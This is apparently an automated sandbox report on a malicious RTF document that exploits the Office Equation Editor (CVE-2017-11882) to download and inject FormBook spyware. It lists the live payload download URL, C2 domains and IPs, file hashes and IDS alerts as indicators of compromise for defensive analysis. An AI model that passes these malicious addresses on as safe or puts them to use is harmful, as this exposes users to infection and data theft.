          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph. Behavior Graph ID: 383958; Sample: dot.dot; Startdate: 08/04/2021; Architecture: WINDOWS; Score: 100. Process chain shown: EQNEDT32.EXE started vbc.exe, which started a second vbc.exe; that process was injected into explorer.exe, which started NAPSTAT.EXE, which started cmd.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          dot.dot | 43% | Virustotal | | Browse
          dot.dot | 33% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |

          Dropped Files

          Source | Detection | Scanner | Label | Link
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 42% | ReversingLabs | Win32.Spyware.Noon |
          C:\Users\Public\vbc.exe | 42% | ReversingLabs | Win32.Spyware.Noon |

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          7.2.NAPSTAT.EXE.2837960.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
          7.2.NAPSTAT.EXE.5132e0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          Source | Detection | Scanner | Label | Link
          k9cdna.51w4.com | 1% | Virustotal | | Browse
          www.likehowto.com | 0% | Virustotal | | Browse

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe |
          http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe |
          http://www.dailymail.co.uk/ | 0% | URL Reputation | safe |
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
          http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe |
          http://%s.com | 0% | URL Reputation | safe |
          http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe |
          http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe |
          http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe |
          http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe |
          http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe |
          http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe |
          http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe |
          http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe |
          http://busca.igbusca.com.br/ | 0% | URL Reputation | safe |
          http://search.auction.co.kr/ | 0% | URL Reputation | safe |
          http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe |
          http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe |
          http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe |
          http://google.pchome.com.tw/ | 0% | URL Reputation | safe |
          http://www.ozu.es/favicon.ico | 0% | Avira URL Cloud | safe |
          http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe |
          http://www.gmarket.co.kr/ | 0% | URL Reputation | safe |
          http://searchresults.news.com.au/ | 0% | URL Reputation | safe |
          http://www.asharqalawsat.com/ | 0% | URL Reputation | safe |
          http://search.yahoo.co.jp | 0% | URL Reputation | safe |
          www.scott-re.online/nnmd/ | 100% | Avira URL Cloud | malware |
          http://buscador.terra.es/ | 0% | URL Reputation | safe |
          http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe |
          http://www.iask.com/ | 0% | URL Reputation | safe |
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
k9cdna.51w4.com | 45.142.156.44 | true | true | | unknown
www.likehowto.com | 203.76.236.103 | true | true | | unknown
www.xpddwrfj.icu | unknown | unknown | true | | unknown
www.pjsgsc.com | unknown | unknown | true | | unknown
www.hcr.services | unknown | unknown | true | | unknown
www.7985699.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.scott-re.online/nnmd/ | true | Avira URL Cloud: malware | low

URLs from Memory and Binaries

                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://investor.msn.com/explorer.exe, 00000006.00000000.2094304052.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000006.00000000.2105239966.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown

                                                                                                                                                      Contacted IPs


                                                                                                                                                      Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 45.142.156.44 | k9cdna.51w4.com | United Kingdom | 40065 | CNSERVERSUS | true |
| 23.95.122.24 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false |
| 203.76.236.103 | www.likehowto.com | Hong Kong | 26658 | HENGTONG-IDC-LLCUS | true |

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.22
                                                                                                                                                      192.168.2.255

                                                                                                                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383958
Start date: 08.04.2021
Start time: 13:08:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: dot.dot
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOT@10/8@8/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 30.3% (good quality ratio 28.7%)
• Quality average: 68.8%
• Quality standard deviation: 29.6%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 81
• Number of non-executed functions: 33
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dot
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 13:08:37 | API Interceptor | 243x Sleep call for process: EQNEDT32.EXE modified |
| 13:08:41 | API Interceptor | 34x Sleep call for process: vbc.exe modified |
| 13:08:56 | API Interceptor | 158x Sleep call for process: NAPSTAT.EXE modified |
| 13:10:01 | API Interceptor | 1x Sleep call for process: explorer.exe modified |

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs


                                                                                                                                                      Domains


                                                                                                                                                      ASN


                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):387072
                                                                                                                                                      Entropy (8bit):6.9572597315329805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                      MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                      SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                      SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://23.95.122.24/zyo/vbc.exe
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16896
                                                                                                                                                      Entropy (8bit):3.637679925139952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:3rOmx7l0ugn8SIWlnrAc+zxPKbJB9C54wCpj2LxwMhVEwvk4P7:3rOmx7Z5Un0c+NKpq1Uj5MDE6P7
                                                                                                                                                      MD5:0D7AA095A33BF035BB24251F43CF09B7
                                                                                                                                                      SHA1:C1B6823BFAA14AFF5DEB1376DCC5BCDA006B7709
                                                                                                                                                      SHA-256:B0E095778B4D43E99ABF372ED444644AB846E6D6534B49FAFCC3D3EAAA515D36
                                                                                                                                                      SHA-512:926243D893DC5F5B8812898CC6D0304A0C979B6821E8846B23BE836E0490CFFEFDD707C65E84DA5151EE8A1D163D12A97EEBD9D69CE0E0B89723D7289CBE1AFA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555C4A64-8E09-401E-A760-1A1C7B299BE3}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dot.LNK
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Apr 8 19:08:35 2021, length=12899, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1946
                                                                                                                                                      Entropy (8bit):4.492176824444847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8e6/XTm6GreVbsYeHDv3qSndM7dD2e6/XTm6GreVbsYeHDv3qSndM7dV:81/XTFGq9NZWQh21/XTFGq9NZWQ/
                                                                                                                                                      MD5:579CAEE57451C12C1DE3B6B2B4EAE5D7
                                                                                                                                                      SHA1:BF656A7E33237BEFE4112DF98153BD763C762535
                                                                                                                                                      SHA-256:81B2D9CD1AF7A1DD11C9721D01A1ED866CA661CEB3D6D66FFFC7EE5C67BC072B
                                                                                                                                                      SHA-512:5DADEB7516C676D8F9D98BF073F73BABE8C1BE18A1DB8E9078CB73CB878EC23BD4DBBA32ED530E218FEA094954A9421A8ED13727C4F93ED62274A92F3D266CB8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...T.S..{..T.S..{.......,..c2...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.c2...R.. .dot.dot.<.......Q.y.Q.y*...8.....................d.o.t...d.o.t.......q...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\dot.dot.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.t...d.o.t.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F.... ..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):47
                                                                                                                                                      Entropy (8bit):3.6274074179507254
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bLKtp2Z82mALKtp2v:Qp88sEpI
                                                                                                                                                      MD5:34FC18ECF62CC5AECC4726F9FE45683D
                                                                                                                                                      SHA1:88081A58059D6CC1AF814F573CAB2F1B464AC972
                                                                                                                                                      SHA-256:25BC5FF0110BC4AAF0DABDCFACBD5935B62DEE77CD35131288CF3FD5D0218BE7
                                                                                                                                                      SHA-512:4E5385A30EC4B41FFE7BF0507513CCECF45E52D6CB24CFF3166C9EF35C9070C87C0F39041D23EA0BA454E7C6869958843C3E0FC82257824A0E46CE7F1EC035F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [dot]..dot.LNK=0..dot.LNK=0..[dot]..dot.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                      C:\Users\user\Desktop\~$dot.dot
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):387072
                                                                                                                                                      Entropy (8bit):6.9572597315329805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                      MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                      SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                      SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                                                      Entropy (8bit):5.628188977802884
                                                                                                                                                      TrID:
                                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                                      File name:dot.dot
                                                                                                                                                      File size:12899
                                                                                                                                                      MD5:40f03856876fda8b3bda880d1d5a4636
                                                                                                                                                      SHA1:d252c054154c5524dfbf3f3238b32f711290fd36
                                                                                                                                                      SHA256:a4358b898c41852211ee727e4b8c0d05301bf4c6a90a4780c5a6f8b1b1cf5c81
                                                                                                                                                      SHA512:559a93f09a07a3aa13ffce038ef2d47a1b73ef6301fd2799a9b3cae99b3e7b652e65951a318cbe7bc31ae25ffeb05c644b08f306553ec9c70b4e60794e1e6687
                                                                                                                                                      SSDEEP:384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
                                                                                                                                                      File Content Preview:{\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?*/:]@6!4'``9.($4|'%;!!6|5?9.<@:;+[^~#%'|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?|,,?;//)#%&..|%?02>9>|._4*,/&]9?&1-!..|0&.@?.88?%%;;(3`8?[*.+*^4&29|%5*|?1|%=1]^+)([,-.?0^@)#:

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:ecaea28aa4dcdc80

                                                                                                                                                      Static RTF Info

                                                                                                                                                      Objects

                                                                                                                                                      Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                                                                                                                      0 | 00001E9Bh |  |  |  |  |  |  |  | no

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                      04/08/21-13:10:40.826650 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8
                                                                                                                                                      04/08/21-13:10:49.795681 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8
                                                                                                                                                      04/08/21-13:10:50.936537 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8
                                                                                                                                                      04/08/21-13:10:56.630959 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 45.142.156.44
                                                                                                                                                      04/08/21-13:10:56.630959 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 45.142.156.44
                                                                                                                                                      04/08/21-13:10:56.630959 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 45.142.156.44

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                      Apr 8, 2021 13:09:08.912623882 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912676096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912694931 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912731886 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912746906 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912791014 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912810087 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912847996 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912848949 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912908077 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912924051 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912971973 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913063049 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913116932 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913146019 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913172960 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913177967 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913233042 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913248062 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913280010 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.914417982 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.030987024 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031053066 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031111002 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031164885 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031299114 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031354904 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031682014 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031744957 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031786919 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031804085 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031824112 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031862974 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031884909 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031924963 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.031944036 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.031985998 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032027006 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032042027 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032097101 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032152891 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032156944 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032161951 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032207966 CEST4916780192.168.2.2223.95.122.24
